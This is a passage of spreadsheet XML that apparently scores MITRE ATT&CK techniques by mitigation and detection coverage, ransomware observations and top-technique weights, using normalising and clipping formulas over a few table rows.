        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC425" s="29"/>
      <c r="AD425" s="25" t="str" cm="1">
        <f t="array" ref="AD425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE425" s="25">
        <f>IF(AD425="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF425" s="25" t="str" cm="1">
        <f t="array" ref="AF425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG425" s="25">
        <f>IF(AF425="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH425" s="25" t="str" cm="1">
        <f t="array" ref="AH425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI425" s="25">
        <f>IF(AH425="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ425" s="25" t="str" cm="1">
        <f t="array" ref="AJ425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK425" s="25">
        <f>IF(AJ425="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL425" s="25" t="str" cm="1">
        <f t="array" ref="AL425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM425" s="25">
        <f>IF(AL425="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN425" s="60">
        <v>0</v>
      </c>
      <c r="AO425" s="51">
        <v>0</v>
      </c>
      <c r="AP425" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.3809523809523804E-3</v>
      </c>
      <c r="AQ425" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.4603174603174603E-2</v>
      </c>
      <c r="AR425" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.4603174603174603E-2</v>
      </c>
      <c r="AS425" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT425" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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26" spans="1:47" ht="32.1">
      <c r="A426" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.3133333333333337E-2</v>
      </c>
      <c r="B426" s="25">
        <f>SUM(H426,M426,V426)*(1+SUM(AE426,AG426,AI426,AK426,AM426))</f>
        <v>0.16466666666666668</v>
      </c>
      <c r="C426" s="25" t="s">
        <v>1616</v>
      </c>
      <c r="D426" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E426" s="25" t="s">
        <v>1493</v>
      </c>
      <c r="F426" s="51">
        <v>1</v>
      </c>
      <c r="G426" s="51">
        <v>1</v>
      </c>
      <c r="H426" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I426">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J426">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K426">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L426">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M426" s="25">
        <v>0</v>
      </c>
      <c r="N426" s="51">
        <v>0</v>
      </c>
      <c r="O426" s="51">
        <v>5</v>
      </c>
      <c r="P426" s="51">
        <v>0</v>
      </c>
      <c r="Q426" s="51">
        <v>0</v>
      </c>
      <c r="R426" s="51"/>
      <c r="S426" s="51">
        <v>0</v>
      </c>
      <c r="T426" s="51"/>
      <c r="U426" s="51">
        <v>0</v>
      </c>
      <c r="V426" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W426">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X426">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y426">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z426">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA426">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB426">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC426" s="29" t="s">
        <v>505</v>
      </c>
      <c r="AD426" s="25" t="str" cm="1">
        <f t="array" ref="AD426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC426)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE426" s="25">
        <f>IF(AD426="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF426" s="25" t="str" cm="1">
        <f t="array" ref="AF426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC426)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG426" s="25">
        <f>IF(AF426="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH426" s="25" t="str" cm="1">
        <f t="array" ref="AH426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC426)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI426" s="25">
        <f>IF(AH426="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ426" s="25" t="str" cm="1">
        <f t="array" ref="AJ426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC426)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK426" s="25">
        <f>IF(AJ426="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL426" s="25" t="str" cm="1">
        <f t="array" ref="AL426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC426)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM426" s="25">
        <f>IF(AL426="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN426" s="59">
        <v>2</v>
      </c>
      <c r="AO426" s="51">
        <v>1</v>
      </c>
      <c r="AP426" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.3133333333333337E-2</v>
      </c>
      <c r="AQ426" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.4888888888888897E-2</v>
      </c>
      <c r="AR426" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.4888888888888897E-2</v>
      </c>
      <c r="AS426" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT426" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU42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27" spans="1:47" ht="32.1">
      <c r="A427" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9799999999999997E-2</v>
      </c>
      <c r="B427" s="25">
        <f>SUM(H427,M427,V427)*(1+SUM(AE427,AG427,AI427,AK427,AM427))</f>
        <v>0.16466666666666668</v>
      </c>
      <c r="C427" s="25" t="s">
        <v>1617</v>
      </c>
      <c r="D427" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E427" s="25" t="s">
        <v>1618</v>
      </c>
      <c r="F427" s="51">
        <v>1</v>
      </c>
      <c r="G427" s="51">
        <v>1</v>
      </c>
      <c r="H427" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I427">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J427">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K427">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L427">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M427" s="25">
        <v>0</v>
      </c>
      <c r="N427" s="51">
        <v>1</v>
      </c>
      <c r="O427" s="51">
        <v>2</v>
      </c>
      <c r="P427" s="51">
        <v>1</v>
      </c>
      <c r="Q427" s="51">
        <v>1</v>
      </c>
      <c r="R427" s="51"/>
      <c r="S427" s="51">
        <v>0</v>
      </c>
      <c r="T427" s="51"/>
      <c r="U427" s="51">
        <v>0</v>
      </c>
      <c r="V427" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W427">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X427">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y427">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z427">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA427">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB427">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC427" s="29" t="s">
        <v>295</v>
      </c>
      <c r="AD427" s="25" t="str" cm="1">
        <f t="array" ref="AD427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC427)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE427" s="25">
        <f>IF(AD427="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF427" s="25" t="str" cm="1">
        <f t="array" ref="AF427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG427" s="25">
        <f>IF(AF427="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH427" s="25" t="str" cm="1">
        <f t="array" ref="AH427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC427)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI427" s="25">
        <f>IF(AH427="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ427" s="25" t="str" cm="1">
        <f t="array" ref="AJ427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK427" s="25">
        <f>IF(AJ427="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL427" s="25" t="str" cm="1">
        <f t="array" ref="AL427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM427" s="25">
        <f>IF(AL427="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN427" s="60">
        <v>1</v>
      </c>
      <c r="AO427" s="51">
        <v>0</v>
      </c>
      <c r="AP427" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9799999999999997E-2</v>
      </c>
      <c r="AQ427" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.4888888888888897E-2</v>
      </c>
      <c r="AR427" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.4888888888888897E-2</v>
      </c>
      <c r="AS427" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT427" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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28" spans="1:47">
      <c r="A428" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.8165714285714284E-2</v>
      </c>
      <c r="B428" s="25">
        <f>SUM(H428,M428,V428)*(1+SUM(AE428,AG428,AI428,AK428,AM428))</f>
        <v>0.14832380952380952</v>
      </c>
      <c r="C428" s="25" t="s">
        <v>1619</v>
      </c>
      <c r="D428" s="25" t="s">
        <v>1620</v>
      </c>
      <c r="E428" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F428" s="51">
        <v>1</v>
      </c>
      <c r="G428" s="51">
        <v>1</v>
      </c>
      <c r="H428" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I428">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J428">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K428">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L428">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M428" s="25">
        <v>0</v>
      </c>
      <c r="N428" s="51">
        <v>2</v>
      </c>
      <c r="O428" s="51">
        <v>1</v>
      </c>
      <c r="P428" s="51">
        <v>0</v>
      </c>
      <c r="Q428" s="51">
        <v>2</v>
      </c>
      <c r="R428" s="51"/>
      <c r="S428" s="51">
        <v>0</v>
      </c>
      <c r="T428" s="51"/>
      <c r="U428" s="51">
        <v>0</v>
      </c>
      <c r="V428" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W428">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X428">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y428">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z428">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA428">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB428">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC428" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD428" s="25" t="str" cm="1">
        <f t="array" ref="AD428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC428)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE428" s="25">
        <f>IF(AD428="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF428" s="25" t="str" cm="1">
        <f t="array" ref="AF428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG428" s="25">
        <f>IF(AF428="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH428" s="25" t="str" cm="1">
        <f t="array" ref="AH428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI428" s="25">
        <f>IF(AH428="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ428" s="25" t="str" cm="1">
        <f t="array" ref="AJ428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK428" s="25">
        <f>IF(AJ428="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL428" s="25" t="str" cm="1">
        <f t="array" ref="AL428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM428" s="25">
        <f>IF(AL428="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN428" s="62">
        <v>1</v>
      </c>
      <c r="AO428" s="51">
        <v>1</v>
      </c>
      <c r="AP428" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.8165714285714284E-2</v>
      </c>
      <c r="AQ428" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.9441269841269841E-2</v>
      </c>
      <c r="AR428" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.9441269841269841E-2</v>
      </c>
      <c r="AS428" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT428" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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29" spans="1:47">
      <c r="A429" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5714285714285714E-2</v>
      </c>
      <c r="B429" s="25">
        <f>SUM(H429,M429,V429)*(1+SUM(AE429,AG429,AI429,AK429,AM429))</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="C429" s="25" t="s">
        <v>1621</v>
      </c>
      <c r="D429" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E429" s="25" t="s">
        <v>1622</v>
      </c>
      <c r="F429" s="51">
        <v>1</v>
      </c>
      <c r="G429" s="51">
        <v>1</v>
      </c>
      <c r="H429" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I429">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J429">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K429">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L429">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M429" s="25">
        <v>0</v>
      </c>
      <c r="N429" s="51">
        <v>0</v>
      </c>
      <c r="O429" s="51">
        <v>4</v>
      </c>
      <c r="P429" s="51">
        <v>1</v>
      </c>
      <c r="Q429" s="51">
        <v>0</v>
      </c>
      <c r="R429" s="51"/>
      <c r="S429" s="51">
        <v>0</v>
      </c>
      <c r="T429" s="51"/>
      <c r="U429" s="51">
        <v>0</v>
      </c>
      <c r="V429" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W429">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X429">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y429">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z429">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA429">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB429">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC429" s="29"/>
      <c r="AD429" s="25" t="str" cm="1">
        <f t="array" ref="AD429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE429" s="25">
        <f>IF(AD429="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF429" s="25" t="str" cm="1">
        <f t="array" ref="AF429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG429" s="25">
        <f>IF(AF429="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH429" s="25" t="str" cm="1">
        <f t="array" ref="AH429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI429" s="25">
        <f>IF(AH429="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ429" s="25" t="str" cm="1">
        <f t="array" ref="AJ429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK429" s="25">
        <f>IF(AJ429="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL429" s="25" t="str" cm="1">
        <f t="array" ref="AL429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM429" s="25">
        <f>IF(AL429="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN429" s="58">
        <v>1</v>
      </c>
      <c r="AO429" s="51">
        <v>1</v>
      </c>
      <c r="AP429" s="25">
